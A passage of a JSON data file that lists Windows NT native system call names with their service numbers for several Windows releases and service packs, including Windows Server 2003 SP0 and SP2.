"NtDeleteValueKey": 145, "NtDisplayString": 146, "NtEnumerateBootEntries": 147, "NtEnumerateDriverEntries": 148, "NtEnumerateSystemEnvironmentValuesEx": 149, "NtExtendSection": 150, "NtFilterToken": 151, "NtFlushInstructionCache": 152, "NtFlushKey": 153, "NtFlushVirtualMemory": 154, "NtFlushWriteBuffer": 155, "NtFreeUserPhysicalPages": 156, "NtGetContextThread": 157, "NtGetCurrentProcessorNumber": 158, "NtGetDevicePowerState": 159, "NtGetPlugPlayEvent": 160, "NtGetWriteWatch": 161, "NtImpersonateAnonymousToken": 162, "NtImpersonateThread": 163, "NtInitializeRegistry": 164, "NtInitiatePowerAction": 165, "NtIsSystemResumeAutomatic": 166, "NtListenPort": 167, "NtLoadDriver": 168, "NtLoadKey": 169, "NtLoadKey2": 170, "NtLoadKeyEx": 171, "NtLockFile": 172, "NtLockProductActivationKeys": 173, "NtLockRegistryKey": 174, "NtLockVirtualMemory": 175, "NtMakePermanentObject": 176, "NtMakeTemporaryObject": 177, "NtMapUserPhysicalPages": 178, "NtModifyBootEntry": 179, "NtModifyDriverEntry": 180, "NtNotifyChangeDirectoryFile": 181, "NtNotifyChangeKey": 182, "NtNotifyChangeMultipleKeys": 183, "NtOpenEventPair": 184, "NtOpenIoCompletion": 185, "NtOpenJobObject": 186, "NtOpenKeyedEvent": 187, "NtOpenMutant": 188, "NtOpenObjectAuditAlarm": 189, "NtOpenProcessToken": 190, "NtOpenSemaphore": 191, "NtOpenSymbolicLinkObject": 192, "NtOpenThread": 193, "NtOpenTimer": 194, "NtPlugPlayControl": 195, "NtPrivilegeCheck": 196, "NtPrivilegeObjectAuditAlarm": 197, "NtPrivilegedServiceAuditAlarm": 198, "NtPulseEvent": 199, "NtQueryBootEntryOrder": 200, "NtQueryBootOptions": 201, "NtQueryDebugFilterState": 202, "NtQueryDirectoryObject": 203, "NtQueryDriverEntryOrder": 204, "NtQueryEaFile": 205, "NtQueryFullAttributesFile": 206, "NtQueryInformationAtom": 207, "NtQueryInformationJobObject": 208, "NtQueryInformationPort": 209, "NtQueryInstallUILanguage": 210, "NtQueryIntervalProfile": 211, "NtQueryIoCompletion": 212, "NtQueryMultipleValueKey": 213, "NtQueryMutant": 214, "NtQueryOpenSubKeys": 215, "NtQueryOpenSubKeysEx": 216, "NtQueryPortInformationProcess": 217, "NtQueryQuotaInformationFile": 218, "NtQuerySecurityObject": 219, "NtQuerySemaphore": 220, "NtQuerySymbolicLinkObject": 221, "NtQuerySystemEnvironmentValue": 222, "NtQuerySystemEnvironmentValueEx": 223, "NtQueryTimerResolution": 224, "NtRaiseException": 225, "NtRaiseHardError": 226, "NtRegisterThreadTerminatePort": 227, "NtReleaseKeyedEvent": 228, "NtRemoveProcessDebug": 229, "NtRenameKey": 230, "NtReplaceKey": 231, "NtReplyWaitReplyPort": 232, "NtRequestDeviceWakeup": 233, "NtRequestPort": 234, "NtRequestWakeupLatency": 235, "NtResetEvent": 236, "NtResetWriteWatch": 237, "NtRestoreKey": 238, "NtResumeProcess": 239, "NtSaveKey": 240, "NtSaveKeyEx": 241, "NtSaveMergedKeys": 242, "NtSecureConnectPort": 243, "NtSetBootEntryOrder": 244, "NtSetBootOptions": 245, "NtSetContextThread": 246, "NtSetDebugFilterState": 247, "NtSetDefaultHardErrorPort": 248, "NtSetDefaultLocale": 249, "NtSetDefaultUILanguage": 250, "NtSetDriverEntryOrder": 251, "NtSetEaFile": 252, "NtSetHighEventPair": 253, "NtSetHighWaitLowEventPair": 254, "NtSetInformationDebugObject": 255, "NtSetInformationJobObject": 256, "NtSetInformationKey": 257, "NtSetInformationToken": 258, "NtSetIntervalProfile": 259, "NtSetIoCompletion": 260, "NtSetLdtEntries": 261, "NtSetLowEventPair": 262, "NtSetLowWaitHighEventPair": 263, "NtSetQuotaInformationFile": 264, "NtSetSecurityObject": 265, "NtSetSystemEnvironmentValue": 266, "NtSetSystemEnvironmentValueEx": 267, "NtSetSystemInformation": 268, "NtSetSystemPowerState": 269, "NtSetSystemTime": 270, "NtSetThreadExecutionState": 271, "NtSetTimerResolution": 272, "NtSetUuidSeed": 273, "NtSetVolumeInformationFile": 274, "NtShutdownSystem": 275, "NtSignalAndWaitForSingleObject": 276, "NtStartProfile": 277, "NtStopProfile": 278, "NtSuspendProcess": 279, "NtSuspendThread": 280, "NtSystemDebugControl": 281, "NtTerminateJobObject": 282, "NtTestAlert": 283, "NtTranslateFilePath": 284, "NtUnloadDriver": 285, "NtUnloadKey": 286, "NtUnloadKey2": 287, "NtUnloadKeyEx": 288, "NtUnlockFile": 289, "NtUnlockVirtualMemory": 290, "NtVdmControl": 291, "NtWaitForDebugEvent": 292, "NtWaitForKeyedEvent": 293, "NtWaitHighEventPair": 294, "NtWaitLowEventPair": 295}, "SP2": {"NtMapUserPhysicalPagesScatter": 0, "NtWaitForSingleObject": 1, "NtCallbackReturn": 2, "NtReadFile": 3, "NtDeviceIoControlFile": 4, "NtWriteFile": 5, "NtRemoveIoCompletion": 6, "NtReleaseSemaphore": 7, "NtReplyWaitReceivePort": 8, "NtReplyPort": 9, "NtSetInformationThread": 10, "NtSetEvent": 11, "NtClose": 12, "NtQueryObject": 13, "NtQueryInformationFile": 14, "NtOpenKey": 15, "NtEnumerateValueKey": 16, "NtFindAtom": 17, "NtQueryDefaultLocale": 18, "NtQueryKey": 19, "NtQueryValueKey": 20, "NtAllocateVirtualMemory": 21, "NtQueryInformationProcess": 22, "NtWaitForMultipleObjects32": 23, "NtWriteFileGather": 24, "NtSetInformationProcess": 25, "NtCreateKey": 26, "NtFreeVirtualMemory": 27, "NtImpersonateClientOfPort": 28, "NtReleaseMutant": 29, "NtQueryInformationToken": 30, "NtRequestWaitReplyPort": 31, "NtQueryVirtualMemory": 32, "NtOpenThreadToken": 33, "NtQueryInformationThread": 34, "NtOpenProcess": 35, "NtSetInformationFile": 36, "NtMapViewOfSection": 37, "NtAccessCheckAndAuditAlarm": 38, "NtUnmapViewOfSection": 39, "NtReplyWaitReceivePortEx": 40, "NtTerminateProcess": 41, "NtSetEventBoostPriority": 42, "NtReadFileScatter": 43, "NtOpenThreadTokenEx": 44, "NtOpenProcessTokenEx": 45, "NtQueryPerformanceCounter": 46, "NtEnumerateKey": 47, "NtOpenFile": 48, "NtDelayExecution": 49, "NtQueryDirectoryFile": 50, "NtQuerySystemInformation": 51, "NtOpenSection": 52, "NtQueryTimer": 53, "NtFsControlFile": 54, "NtWriteVirtualMemory": 55, "NtCloseObjectAuditAlarm": 56, "NtDuplicateObject": 57, "NtQueryAttributesFile": 58, "NtClearEvent": 59, "NtReadVirtualMemory": 60, "NtOpenEvent": 61, "NtAdjustPrivilegesToken": 62, "NtDuplicateToken": 63, "NtContinue": 64, "NtQueryDefaultUILanguage": 65, "NtQueueApcThread": 66, "NtYieldExecution": 67, "NtAddAtom": 68, "NtCreateEvent": 69, "NtQueryVolumeInformationFile": 70, "NtCreateSection": 71, "NtFlushBuffersFile": 72, "NtApphelpCacheControl": 73, "NtCreateProcessEx": 74, "NtCreateThread": 75, "NtIsProcessInJob": 76, "NtProtectVirtualMemory": 77, "NtQuerySection": 78, "NtResumeThread": 79, "NtTerminateThread": 80, "NtReadRequestData": 81, "NtCreateFile": 82, "NtQueryEvent": 83, "NtWriteRequestData": 84, "NtOpenDirectoryObject": 85, "NtAccessCheckByTypeAndAuditAlarm": 86, "NtQuerySystemTime": 87, "NtWaitForMultipleObjects": 88, "NtSetInformationObject": 89, "NtCancelIoFile": 90, "NtTraceEvent": 91, "NtPowerInformation": 92, "NtSetValueKey": 93, "NtCancelTimer": 94, "NtSetTimer": 95, "NtAcceptConnectPort": 96, "NtAccessCheck": 97, "NtAccessCheckByType": 98, "NtAccessCheckByTypeResultList": 99, "NtAccessCheckByTypeResultListAndAuditAlarm": 100, "NtAccessCheckByTypeResultListAndAuditAlarmByHandle": 101, "NtAddBootEntry": 102, "NtAddDriverEntry": 103, "NtAdjustGroupsToken": 104, "NtAlertResumeThread": 105, "NtAlertThread": 106, "NtAllocateLocallyUniqueId": 107, "NtAllocateUserPhysicalPages": 108, "NtAllocateUuids": 109, "NtAreMappedFilesTheSame": 110, "NtAssignProcessToJobObject": 111, "NtCancelDeviceWakeupRequest": 112, "NtCompactKeys": 113, "NtCompareTokens": 114, "NtCompleteConnectPort": 115, "NtCompressKey": 116, "NtConnectPort": 117, "NtCreateDebugObject": 118, "NtCreateDirectoryObject": 119, "NtCreateEventPair": 120, "NtCreateIoCompletion": 121, "NtCreateJobObject": 122, "NtCreateJobSet": 123, "NtCreateKeyedEvent": 124, "NtCreateMailslotFile": 125, "NtCreateMutant": 126, "NtCreateNamedPipeFile": 127, "NtCreatePagingFile": 128, "NtCreatePort": 129, "NtCreateProcess": 130, "NtCreateProfile": 131, "NtCreateSemaphore": 132, "NtCreateSymbolicLinkObject": 133, "NtCreateTimer": 134, "NtCreateToken": 135, "NtCreateWaitablePort": 136, "NtDebugActiveProcess": 137, "NtDebugContinue": 138, "NtDeleteAtom": 139, "NtDeleteBootEntry": 140, "NtDeleteDriverEntry": 141, "NtDeleteFile": 142, "NtDeleteKey": 143, "NtDeleteObjectAuditAlarm": 144, "NtDeleteValueKey": 145, "NtDisplayString": 146, "NtEnumerateBootEntries": 147, "NtEnumerateDriverEntries": 148, "NtEnumerateSystemEnvironmentValuesEx": 149, "NtExtendSection": 150, "NtFilterToken": 151, "NtFlushInstructionCache": 152, "NtFlushKey": 153, "NtFlushVirtualMemory": 154, "NtFlushWriteBuffer": 155, "NtFreeUserPhysicalPages": 156, "NtGetContextThread": 157, "NtGetCurrentProcessorNumber": 158, "NtGetDevicePowerState": 159, "NtGetPlugPlayEvent": 160, "NtGetWriteWatch": 161, "NtImpersonateAnonymousToken": 162, "NtImpersonateThread": 163, "NtInitializeRegistry": 164, "NtInitiatePowerAction": 165, "NtIsSystemResumeAutomatic": 166, "NtListenPort": 167, "NtLoadDriver": 168, "NtLoadKey": 169, "NtLoadKey2": 170, "NtLoadKeyEx": 171, "NtLockFile": 172, "NtLockProductActivationKeys": 173, "NtLockRegistryKey": 174, "NtLockVirtualMemory": 175, "NtMakePermanentObject": 176, "NtMakeTemporaryObject": 177, "NtMapUserPhysicalPages": 178, "NtModifyBootEntry": 179, "NtModifyDriverEntry": 180, "NtNotifyChangeDirectoryFile": 181, "NtNotifyChangeKey": 182, "NtNotifyChangeMultipleKeys": 183, "NtOpenEventPair": 184, "NtOpenIoCompletion": 185, "NtOpenJobObject": 186, "NtOpenKeyedEvent": 187, "NtOpenMutant": 188, "NtOpenObjectAuditAlarm": 189, "NtOpenProcessToken": 190, "NtOpenSemaphore": 191, "NtOpenSymbolicLinkObject": 192, "NtOpenThread": 193, "NtOpenTimer": 194, "NtPlugPlayControl": 195, "NtPrivilegeCheck": 196, "NtPrivilegeObjectAuditAlarm": 197, "NtPrivilegedServiceAuditAlarm": 198, "NtPulseEvent": 199, "NtQueryBootEntryOrder": 200, "NtQueryBootOptions": 201, "NtQueryDebugFilterState": 202, "NtQueryDirectoryObject": 203, "NtQueryDriverEntryOrder": 204, "NtQueryEaFile": 205, "NtQueryFullAttributesFile": 206, "NtQueryInformationAtom": 207, "NtQueryInformationJobObject": 208, "NtQueryInformationPort": 209, "NtQueryInstallUILanguage": 210, "NtQueryIntervalProfile": 211, "NtQueryIoCompletion": 212, "NtQueryMultipleValueKey": 213, "NtQueryMutant": 214, "NtQueryOpenSubKeys": 215, "NtQueryOpenSubKeysEx": 216, "NtQueryPortInformationProcess": 217, "NtQueryQuotaInformationFile": 218, "NtQuerySecurityObject": 219, "NtQuerySemaphore": 220, "NtQuerySymbolicLinkObject": 221, "NtQuerySystemEnvironmentValue": 222, "NtQuerySystemEnvironmentValueEx": 223, "NtQueryTimerResolution": 224, "NtRaiseException": 225, "NtRaiseHardError": 226, "NtRegisterThreadTerminatePort": 227, "NtReleaseKeyedEvent": 228, "NtRemoveProcessDebug": 229, "NtRenameKey": 230, "NtReplaceKey": 231, "NtReplyWaitReplyPort": 232, "NtRequestDeviceWakeup": 233, "NtRequestPort": 234, "NtRequestWakeupLatency": 235, "NtResetEvent": 236, "NtResetWriteWatch": 237, "NtRestoreKey": 238, "NtResumeProcess": 239, "NtSaveKey": 240, "NtSaveKeyEx": 241, "NtSaveMergedKeys": 242, "NtSecureConnectPort": 243, "NtSetBootEntryOrder": 244, "NtSetBootOptions": 245, "NtSetContextThread": 246, "NtSetDebugFilterState": 247, "NtSetDefaultHardErrorPort": 248, "NtSetDefaultLocale": 249, "NtSetDefaultUILanguage": 250, "NtSetDriverEntryOrder": 251, "NtSetEaFile": 252, "NtSetHighEventPair": 253, "NtSetHighWaitLowEventPair": 254, "NtSetInformationDebugObject": 255, "NtSetInformationJobObject": 256, "NtSetInformationKey": 257, "NtSetInformationToken": 258, "NtSetIntervalProfile": 259, "NtSetIoCompletion": 260, "NtSetLdtEntries": 261, "NtSetLowEventPair": 262, "NtSetLowWaitHighEventPair": 263, "NtSetQuotaInformationFile": 264, "NtSetSecurityObject": 265, "NtSetSystemEnvironmentValue": 266, "NtSetSystemEnvironmentValueEx": 267, "NtSetSystemInformation": 268, "NtSetSystemPowerState": 269, "NtSetSystemTime": 270, "NtSetThreadExecutionState": 271, "NtSetTimerResolution": 272, "NtSetUuidSeed": 273, "NtSetVolumeInformationFile": 274, "NtShutdownSystem": 275, "NtSignalAndWaitForSingleObject": 276, "NtStartProfile": 277, "NtStopProfile": 278, "NtSuspendProcess": 279, "NtSuspendThread": 280, "NtSystemDebugControl": 281, "NtTerminateJobObject": 282, "NtTestAlert": 283, "NtTranslateFilePath": 284, "NtUnloadDriver": 285, "NtUnloadKey": 286, "NtUnloadKey2": 287, "NtUnloadKeyEx": 288, "NtUnlockFile": 289, "NtUnlockVirtualMemory": 290, "NtVdmControl": 291, "NtWaitForDebugEvent": 292, "NtWaitForKeyedEvent": 293, "NtWaitHighEventPair": 294, "NtWaitLowEventPair": 295}}, "Windows Server 2003": {"SP0": {"NtMapUserPhysicalPagesScatter": 0, "NtWaitForSingleObject": 1, "NtCallbackReturn": 2, "NtReadFile": 3, "NtDeviceIoControlFile": 4, "NtWriteFile": 5, "NtRemoveIoCompletion": 6, "NtReleaseSemaphore": 7, "NtReplyWaitReceivePort": 8, "NtReplyPort": 9, "NtSetInformationThread": 10, "NtSetEvent": 11, "NtClose": 12, "NtQueryObject": 13, "NtQueryInformationFile": 14, "NtOpenKey": 15, "NtEnumerateValueKey": 16, "NtFindAtom": 17, "NtQueryDefaultLocale": 18, "NtQueryKey": 19, "NtQueryValueKey": 20, "NtAllocateVirtualMemory": 21, "NtQueryInformationProcess": 22, "NtWaitForMultipleObjects32": 23, "NtWriteFileGather": 24, "NtSetInformationProcess": 25, "NtCreateKey": 26, "NtFreeVirtualMemory": 27, "NtImpersonateClientOfPort": 28, "NtReleaseMutant": 29, "NtQueryInformationToken": 30, "NtRequestWaitReplyPort": 31, "NtQueryVirtualMemory": 32, "NtOpenThreadToken": 33, "NtQueryInformationThread": 34, "NtOpenProcess": 35, "NtSetInformationFile": 36, "NtMapViewOfSection": 37, "NtAccessCheckAndAuditAlarm": 38, "NtUnmapViewOfSection": 39, "NtReplyWaitReceivePortEx": 40, "NtTerminateProcess": 41, "NtSetEventBoostPriority": 42, "NtReadFileScatter": 43, "NtOpenThreadTokenEx": 44, "NtOpenProcessTokenEx": 45, "NtQueryPerformanceCounter": 46, "NtEnumerateKey": 47, "NtOpenFile": 48, "NtDelayExecution": 49, "NtQueryDirectoryFile": 50, "NtQuerySystemInformation": 51, "NtOpenSection": 52, "NtQueryTimer": 53, "NtFsControlFile": 54, "NtWriteVirtualMemory": 55, "NtCloseObjectAuditAlarm": 56, "NtDuplicateObject": 57, "NtQueryAttributesFile": 58, "NtClearEvent": 59, "NtReadVirtualMemory": 60, "NtOpenEvent": 61, "NtAdjustPrivilegesToken": 62, "NtDuplicateToken": 63, "NtContinue": 64, "NtQueryDefaultUILanguage": 65, "NtQueueApcThread": 66, "NtYieldExecution": 67, "NtAddAtom": 68, "NtCreateEvent": 69, "NtQueryVolumeInformationFile": 70, "NtCreateSection": 71, "NtFlushBuffersFile": 72, "NtApphelpCacheControl": 73, "NtCreateProcessEx": 74, "NtCreateThread": 75, "NtIsProcessInJob": 76, "NtProtectVirtualMemory": 77, "NtQuerySection": 78, "NtResumeThread": 79, "NtTerminateThread": 80, "NtReadRequestData": 81, "NtCreateFile": 82, "NtQueryEvent": 83, "NtWriteRequestData": 84, "NtOpenDirectoryObject": 85, "NtAccessCheckByTypeAndAuditAlarm": 86, "NtQuerySystemTime": 87, "NtWaitForMultipleObjects": 88, "NtSetInformationObject": 89, "NtCancelIoFile": 90, "NtTraceEvent": 91, "NtPowerInformation": 92, "NtSetValueKey": 93, "NtCancelTimer": 94, "NtSetTimer": 95, "NtAcceptConnectPort": 96, "NtAccessCheck": 97, "NtAccessCheckByType": 98, "NtAccessCheckByTypeResultList": 99, "NtAccessCheckByTypeResultListAndAuditAlarm": 100, "NtAccessCheckByTypeResultListAndAuditAlarmByHandle": 101, "NtAddBootEntry": 102, "NtAddDriverEntry": 103, "NtAdjustGroupsToken": 104, "NtAlertResumeThread": 105, "NtAlertThread": 106, "NtAllocateLocallyUniqueId": 107, "NtAllocateUserPhysicalPages": 108, "NtAllocateUuids": 109, "NtAreMappedFilesTheSame": 110, "NtAssignProcessToJobObject": 111, "NtCancelDeviceWakeupRequest": 112, "NtCompactKeys": 113, "NtCompareTokens": 114, "NtCompleteConnectPort": 115, "NtCompressKey": 116, "NtConnectPort": 117, "NtCreateDebugObject": 118, "NtCreateDirectoryObject": 119, "NtCreateEventPair": 120, "NtCreateIoCompletion": 121, "NtCreateJobObject": 122, "NtCreateJobSet": 123, "NtCreateKeyedEvent": 124, "NtCreateMailslotFile": 125, "NtCreateMutant": 126, "NtCreateNamedPipeFile": 127, "NtCreatePagingFile": 128, "NtCreatePort": 129, "NtCreateProcess": 130, "NtCreateProfile": 131, "NtCreateSemaphore": 132, "NtCreateSymbolicLinkObject": 133, "NtCreateTimer": 134, "NtCreateToken": 135, "NtCreateWaitablePort": 136, "NtDebugActiveProcess": 137, "NtDebugContinue": 138, "NtDeleteAtom": 139, "NtDeleteBootEntry": 140, "NtDeleteDriverEntry": 141, "NtDeleteFile": 142, "NtDeleteKey": 143, "NtDeleteObjectAuditAlarm": 144, "NtDeleteValueKey": 145, "NtDisplayString": 146, "NtEnumerateBootEntries": 147, "NtEnumerateDriverEntries": 148, "NtEnumerateSystemEnvironmentValuesEx": 149, "NtExtendSection": 150, "NtFilterToken": 151, "NtFlushInstructionCache": 152, "NtFlushKey": 153, "NtFlushVirtualMemory": 154, "NtFlushWriteBuffer": 155, "NtFreeUserPhysicalPages": 156, "NtGetContextThread": 157, "NtGetCurrentProcessorNumber": 158, "NtGetDevicePowerState": 159, "NtGetPlugPlayEvent": 160, "NtGetWriteWatch": 161, "NtImpersonateAnonymousToken": 162, "NtImpersonateThread": 163, "NtInitializeRegistry": 164, "NtInitiatePowerAction": 165, "NtIsSystemResumeAutomatic": 166, "NtListenPort": 167, "NtLoadDriver": 168, "NtLoadKey": 169, "NtLoadKey2": 170, "NtLoadKeyEx": 171, "NtLockFile": 172, "NtLockProductActivationKeys": 173, "NtLockRegistryKey": 174, "NtLockVirtualMemory": 175, "NtMakePermanentObject": 176, "NtMakeTemporaryObject": 177, "NtMapUserPhysicalPages": 178, "NtModifyBootEntry": 179, "NtModifyDriverEntry": 180, "NtNotifyChangeDirectoryFile": 181, "NtNotifyChangeKey": 182, "NtNotifyChangeMultipleKeys": 183, "NtOpenEventPair": 184, "NtOpenIoCompletion": 185, "NtOpenJobObject": 186, "NtOpenKeyedEvent": 187, "NtOpenMutant": 188, "NtOpenObjectAuditAlarm": 189, "NtOpenProcessToken": 190, "NtOpenSemaphore": 191, "NtOpenSymbolicLinkObject": 192, "NtOpenThread": 193, "NtOpenTimer": 194, "NtPlugPlayControl": 195, "NtPrivilegeCheck": 196, "NtPrivilegeObjectAuditAlarm": 197, "NtPrivilegedServiceAuditAlarm": 198, "NtPulseEvent": 199, "NtQueryBootEntryOrder": 200, "NtQueryBootOptions": 201, "NtQueryDebugFilterState": 202, "NtQueryDirectoryObject": 203, "NtQueryDriverEntryOrder": 204, "NtQueryEaFile": 205, "NtQueryFullAttributesFile": 206, "NtQueryInformationAtom": 207, "NtQueryInformationJobObject": 208, "NtQueryInformationPort": 209, "NtQueryInstallUILanguage": 210, "NtQueryIntervalProfile": 211, "NtQueryIoCompletion": 212, "NtQueryMultipleValueKey": 213, "NtQueryMutant": 214, "NtQueryOpenSubKeys": 215, "NtQueryOpenSubKeysEx": 216, "NtQueryPortInformationProcess": 217, "NtQueryQuotaInformationFile": 218, "NtQuerySecurityObject": 219, "NtQuerySemaphore": 220, "NtQuerySymbolicLinkObject": 221, "NtQuerySystemEnvironmentValue": 222, "NtQuerySystemEnvironmentValueEx": 223, "NtQueryTimerResolution": 224, "NtRaiseException": 225, "NtRaiseHardError": 226, "NtRegisterThreadTerminatePort": 227, "NtReleaseKeyedEvent": 228, "NtRemoveProcessDebug": 229, "NtRenameKey": 230, "NtReplaceKey": 231, "NtReplyWaitReplyPort": 232, "NtRequestDeviceWakeup": 233, "NtRequestPort": 234, "NtRequestWakeupLatency": 235, "NtResetEvent": 236, "NtResetWriteWatch": 237, "NtRestoreKey": 238, "NtResumeProcess": 239, "NtSaveKey": 240, "NtSaveKeyEx": 241, "NtSaveMergedKeys": 242, "NtSecureConnectPort": 243, "NtSetBootEntryOrder": 244, "NtSetBootOptions": 245, "NtSetContextThread": 246, "NtSetDebugFilterState": 247, "NtSetDefaultHardErrorPort": 248, "NtSetDefaultLocale": 249, "NtSetDefaultUILanguage": 250, "NtSetDriverEntryOrder": 251, "NtSetEaFile": 252, "NtSetHighEventPair": 253, "NtSetHighWaitLowEventPair": 254, "NtSetInformationDebugObject": 255, "NtSetInformationJobObject": 256, "NtSetInformationKey": 257, "NtSetInformationToken": 258, "NtSetIntervalProfile": 259, "NtSetIoCompletion": 260, "NtSetLdtEntries": 261, "NtSetLowEventPair": 262, "NtSetLowWaitHighEventPair": 263, "NtSetQuotaInformationFile": 264, "NtSetSecurityObject": 265, "NtSetSystemEnvironmentValue": 266, "NtSetSystemEnvironmentValueEx": 267, "NtSetSystemInformation": 268, "NtSetSystemPowerState": 269, "NtSetSystemTime": 270, "NtSetThreadExecutionState": 271, "NtSetTimerResolution": 272, "NtSetUuidSeed": 273, "NtSetVolumeInformationFile": 274, "NtShutdownSystem": 275, "NtSignalAndWaitForSingleObject": 276, "NtStartProfile": 277, "NtStopProfile": 278, "NtSuspendProcess": 279, "NtSuspendThread": 280, "NtSystemDebugControl": 281, "NtTerminateJobObject": 282, "NtTestAlert": 283, "NtTranslateFilePath": 284, "NtUnloadDriver": 285, "NtUnloadKey": 286, "NtUnloadKey2": 287, "NtUnloadKeyEx": 288, "NtUnlockFile": 289, "NtUnlockVirtualMemory": 290, "NtVdmControl": 291, "NtWaitForDebugEvent": 292, "NtWaitForKeyedEvent": 293, "NtWaitHighEventPair": 294, "NtWaitLowEventPair": 295}, "SP2": {"NtMapUserPhysicalPagesScatter": 0, "NtWaitForSingleObject": 1, "NtCallbackReturn": 2, "NtReadFile": 3, "NtDeviceIoControlFile": 4, "NtWriteFile": 5, "NtRemoveIoCompletion": 6, "NtReleaseSemaphore": 7, "NtReplyWaitReceivePort": 8, "NtReplyPort": 9, "NtSetInformationThread": 10, "NtSetEvent": 11, "NtClose": 12, "NtQueryObject": 13, "NtQueryInformationFile": 14, "NtOpenKey": 15, "NtEnumerateValueKey": 16, "NtFindAtom": 17, "NtQueryDefaultLocale": 18, "NtQueryKey": 19, "NtQueryValueKey": 20, "NtAllocateVirtualMemory": 21, "NtQueryInformationProcess": 22, "NtWaitForMultipleObjects32": 23, "NtWriteFileGather": 24, "NtSetInformationProcess": 25, "NtCreateKey": 26, "NtFreeVirtualMemory": 27, "NtImpersonateClientOfPort": 28, "NtReleaseMutant": 29, "NtQueryInformationToken": 30, "NtRequestWaitReplyPort": 31, "NtQueryVirtualMemory": 32, "NtOpenThreadToken": 33, "NtQueryInformationThread": 34, "NtOpenProcess": 35, "NtSetInformationFile": 36, "NtMapViewOfSection": 37, "NtAccessCheckAndAuditAlarm": 38, "NtUnmapViewOfSection": 39, "NtReplyWaitReceivePortEx": 40, "NtTerminateProcess": 41, "NtSetEventBoostPriority": 42, "NtReadFileScatter": 43, "NtOpenThreadTokenEx": 44, "NtOpenProcessTokenEx": 45, "NtQueryPerformanceCounter": 46, "NtEnumerateKey": 47, "NtOpenFile": 48, "NtDelayExecution": 49, "NtQueryDirectoryFile": 50, "NtQuerySystemInformation": 51, "NtOpenSection": 52, "NtQueryTimer": 53, "NtFsControlFile": 54, "NtWriteVirtualMemory": 55, "NtCloseObjectAuditAlarm": 56, "NtDuplicateObject": 57, "NtQueryAttributesFile": 58, "NtClearEvent": 59, "NtReadVirtualMemory": 60, "NtOpenEvent": 61, "NtAdjustPrivilegesToken": 62, "NtDuplicateToken": 63, "NtContinue": 64, "NtQueryDefaultUILanguage": 65, "NtQueueApcThread": 66, "NtYieldExecution": 67, "NtAddAtom": 68, "NtCreateEvent": 69, "NtQueryVolumeInformationFile": 70, "NtCreateSection": 71, "NtFlushBuffersFile": 72, "NtApphelpCacheControl": 73, "NtCreateProcessEx": 74, "NtCreateThread": 75, "NtIsProcessInJob": 76, "NtProtectVirtualMemory": 77, "NtQuerySection": 78, "NtResumeThread": 79, "NtTerminateThread": 80, "NtReadRequestData": 81, "NtCreateFile": 82, "NtQueryEvent": 83, "NtWriteRequestData": 84, "NtOpenDirectoryObject": 85, "NtAccessCheckByTypeAndAuditAlarm": 86, "NtQuerySystemTime": 87, "NtWaitForMultipleObjects": 88, "NtSetInformationObject": 89, "NtCancelIoFile": 90, "NtTraceEvent": 91, "NtPowerInformation": 92, "NtSetValueKey": 93, "NtCancelTimer": 94, "NtSetTimer": 95, "NtAcceptConnectPort": 96, "NtAccessCheck": 97, "NtAccessCheckByType": 98, "NtAccessCheckByTypeResultList": 99, "NtAccessCheckByTypeResultListAndAuditAlarm": 100, "NtAccessCheckByTypeResultListAndAuditAlarmByHandle": 101, "NtAddBootEntry": 102, "NtAddDriverEntry": 103, "NtAdjustGroupsToken": 104, "NtAlertResumeThread": 105, "NtAlertThread": 106, "NtAllocateLocallyUniqueId": 107, "NtAllocateUserPhysicalPages": 108, "NtAllocateUuids": 109, "NtAreMappedFilesTheSame": 110, "NtAssignProcessToJobObject": 111, "NtCancelDeviceWakeupRequest": 112, "NtCompactKeys": 113, "NtCompareTokens": 114, "NtCompleteConnectPort": 115, "NtCompressKey": 116, "NtConnectPort": 117, "NtCreateDebugObject": 118, "NtCreateDirectoryObject": 119, "NtCreateEventPair": 120, "NtCreateIoCompletion": 121, "NtCreateJobObject": 122, "NtCreateJobSet": 123, "NtCreateKeyedEvent": 124, "NtCreateMailslotFile": 125, "NtCreateMutant": 126, "NtCreateNamedPipeFile": 127, "NtCreatePagingFile": 128, "NtCreatePort": 129, "NtCreateProcess": 130, "NtCreateProfile": 131, "NtCreateSemaphore": 132, "NtCreateSymbolicLinkObject": 133, "NtCreateTimer": 134, "NtCreateToken": 135, "NtCreateWaitablePort": 136, "NtDebugActiveProcess": 137, "NtDebugContinue": 138, "NtDeleteAtom": 139, "NtDeleteBootEntry": 140, "NtDeleteDriverEntry": 141, "NtDeleteFile": 142, "NtDeleteKey": 143, "NtDeleteObjectAuditAlarm": 144, "NtDeleteValueKey": 145, "NtDisplayString": 146, "NtEnumerateBootEntries": 147, "NtEnumerateDriverEntries": 148, "NtEnumerateSystemEnvironmentValuesEx": 149, "NtExtendSection": 150, "NtFilterToken": 151, "NtFlushInstructionCache": 152, "NtFlushKey": 153, "NtFlushVirtualMemory": 154, "NtFlushWriteBuffer": 155, "NtFreeUserPhysicalPages": 156, "NtGetContextThread": 157, "NtGetCurrentProcessorNumber": 158, "NtGetDevicePowerState": 159, "NtGetPlugPlayEvent": 160, "NtGetWriteWatch": 161, "NtImpersonateAnonymousToken": 162, "NtImpersonateThread": 163, "NtInitializeRegistry": 164, "NtInitiatePowerAction": 165, "NtIsSystemResumeAutomatic": 166, "NtListenPort": 167, "NtLoadDriver": 168, "NtLoadKey": 169, "NtLoadKey2": 170, "NtLoadKeyEx": 171, "NtLockFile": 172, "NtLockProductActivationKeys": 173, "NtLockRegistryKey": 174, "NtLockVirtualMemory": 175, "NtMakePermanentObject": 176, "NtMakeTemporaryObject": 177, "NtMapUserPhysicalPages": 178, "NtModifyBootEntry": 179, "NtModifyDriverEntry": 180, "NtNotifyChangeDirectoryFile": 181, "NtNotifyChangeKey": 182, "NtNotifyChangeMultipleKeys": 183, "NtOpenEventPair": 184, "NtOpenIoCompletion": 185, "NtOpenJobObject": 186, "NtOpenKeyedEvent": 187, "NtOpenMutant": 188, "NtOpenObjectAuditAlarm": 189, "NtOpenProcessToken": 190, "NtOpenSemaphore": 191, "NtOpenSymbolicLinkObject": 192, "NtOpenThread": 193, "NtOpenTimer": 194, "NtPlugPlayControl": 195, "NtPrivilegeCheck": 196, "NtPrivilegeObjectAuditAlarm": 197, "NtPrivilegedServiceAuditAlarm": 198, "NtPulseEvent": 199, "NtQueryBootEntryOrder": 200, "NtQueryBootOptions": 201, "NtQueryDebugFilterState": 202, "NtQueryDirectoryObject": 203, "NtQueryDriverEntryOrder": 204, "NtQueryEaFile": 205, "NtQueryFullAttributesFile": 206, "NtQueryInformationAtom": 207, "NtQueryInformationJobObject": 208, "NtQueryInformationPort": 209, "NtQueryInstallUILanguage": 210, 